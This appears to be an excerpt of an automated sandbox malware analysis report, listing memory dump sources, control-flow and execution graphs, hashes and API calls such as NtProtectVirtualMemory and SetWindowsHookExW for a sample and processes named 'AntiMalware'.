                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2017059843.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff848f40000_ZzOTKK2V8l.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: H$HAH$HAH
                              • API String ID: 2706961497-375035555
                              • Opcode ID: 870a26bcb9b76dc3ac40d59e03e466c35688e7fa5c939b6ae94ae5f94c7feb56
                              • Instruction ID: 8bcce83ee954596e6d42c86769a6245642548d8817b918899fc985198eda8ead
                              • Opcode Fuzzy Hash: 870a26bcb9b76dc3ac40d59e03e466c35688e7fa5c939b6ae94ae5f94c7feb56
                              • Instruction Fuzzy Hash: 4FC1763191DB495FE71DEB2888162FA77E1EFA5720F0441BED08AC31D7DE28680A8781
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2017059843.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff848f40000_ZzOTKK2V8l.jbxd
                              Similarity
                              • API ID:
                              • String ID: HAH$HAH$jR_H
                              • API String ID: 0-1375340356
                              • Opcode ID: 7f7d48686cbb52fd5785796a362e04af3fa649aef00e5014a1eee0a91213353a
                              • Instruction ID: f7c0c51e1afefa90fd2b30800342a8c2c1757aa56fc5b3d5ffc29946facd94e9
                              • Opcode Fuzzy Hash: 7f7d48686cbb52fd5785796a362e04af3fa649aef00e5014a1eee0a91213353a
                              • Instruction Fuzzy Hash: 88A14732E2DA4A5FF31CAB3898565FA77D1EFA9650F04027FD04AC31D7EE2868068341

                              Execution Graph

                              Execution Coverage:25.6%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:5
                              Total number of Limit Nodes:1
                              execution_graph (node id: address, API called at that node)
                              • 1528: 7ff848f33e3e
                              • 1529: 7ff848f33e6f
                              • 1530: 7ff848f33fdb
                              • 1531: 7ff848f34164 NtProtectVirtualMemory
                              • 1532: 7ff848f341a5
                              • Edges: 1528->1529, 1529->1530, 1529->1531, 1531->1532

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2099390869.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_7ff848f30000_AntiMalware.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: H$HAH$HAH
                              • API String ID: 2706961497-375035555
                              • Opcode ID: 76c97b493aef54e47bf70f3aa0d20dd73e56a36869b3aabc4c8fcdd9a53c4bf1
                              • Instruction ID: a6d2e3c7366a8385b0372c29666660d6844205d6daa7c17f8bf0f7637966b884
                              • Opcode Fuzzy Hash: 76c97b493aef54e47bf70f3aa0d20dd73e56a36869b3aabc4c8fcdd9a53c4bf1
                              • Instruction Fuzzy Hash: D4C16831A1DA495FE71DEB7898162FA37E1EF95350F0442BFE08AC31D7DE2868068781

                              Execution Graph

                              Execution Coverage: 20.8%
                              Dynamic/Decrypted Code Coverage: 100%
                              Signature Coverage: 0%
                              Total number of Nodes: 8
                              Total number of Limit Nodes: 1

                              Execution graph nodes (node id: address, API call where resolved):
                              • 7282: 7ff848f15168
                              • 7283: 7ff848f15171 (SetWindowsHookExW)
                              • 7285: 7ff848f15241
                              • 7277: 7ff848f13e3e
                              • 7279: 7ff848f13e6f
                              • 7278: 7ff848f13fdb
                              • 7280: 7ff848f14164 (NtProtectVirtualMemory)
                              • 7281: 7ff848f141a5
                              Execution graph edges: 7282->7283, 7283->7285, 7277->7279, 7279->7278, 7279->7280, 7280->7281

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000012.00000002.4435575719.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_2_7ff848f10000_AntiMalware.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: HAH$HAH
                              • API String ID: 2706961497-524784639
                              • Opcode ID: 317ba844108585cef5a38c24e0dfb270f679c2fdae0c86a7a19ffc922336e230
                              • Instruction ID: 97ea83b352b9f51c931989e344f0b8fe9cbd7a5045c9af82b0d6be1d5e3f43bc
                              • Opcode Fuzzy Hash: 317ba844108585cef5a38c24e0dfb270f679c2fdae0c86a7a19ffc922336e230
                              • Instruction Fuzzy Hash: 02C1663191DB495FE71DEB3898162FA77E1EF95360F0442BEE08AC31D7DE2868068781

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Control-flow graph basic blocks (block id: address range, API call where resolved):
                              • 1065: 7ff848f15168-7ff848f1516f
                              • 1066: 7ff848f1517a-7ff848f151ed
                              • 1067: 7ff848f15171-7ff848f15179
                              • 1071: 7ff848f15279-7ff848f1527d
                              • 1072: 7ff848f151f3-7ff848f151f8
                              • 1073: 7ff848f15202-7ff848f1523f (SetWindowsHookExW)
                              • 1074: 7ff848f15241
                              • 1075: 7ff848f15247-7ff848f15278
                              • 1076: 7ff848f151ff-7ff848f15200
                              Control-flow graph edges: 1065->1066, 1065->1067, 1066->1071, 1066->1072, 1067->1066, 1071->1073, 1072->1076, 1073->1074, 1073->1075, 1074->1075, 1076->1073
                              APIs
                              Memory Dump Source
                              • Source File: 00000012.00000002.4435575719.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_2_7ff848f10000_AntiMalware.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: 1b5416ceca8645a1575f544fc64301f8b5c528aa4f23f7ee062cb29d34acdb4e
                              • Instruction ID: a76f1e759617823b3e6fa8fba7258b7d995ca3a32f11cf74d80d98defd6e3f57
                              • Opcode Fuzzy Hash: 1b5416ceca8645a1575f544fc64301f8b5c528aa4f23f7ee062cb29d34acdb4e
                              • Instruction Fuzzy Hash: 30412931A1CA4C4FDB58EB6C98066F9BBE1EF59321F00027ED009D3292CB74A852C7D5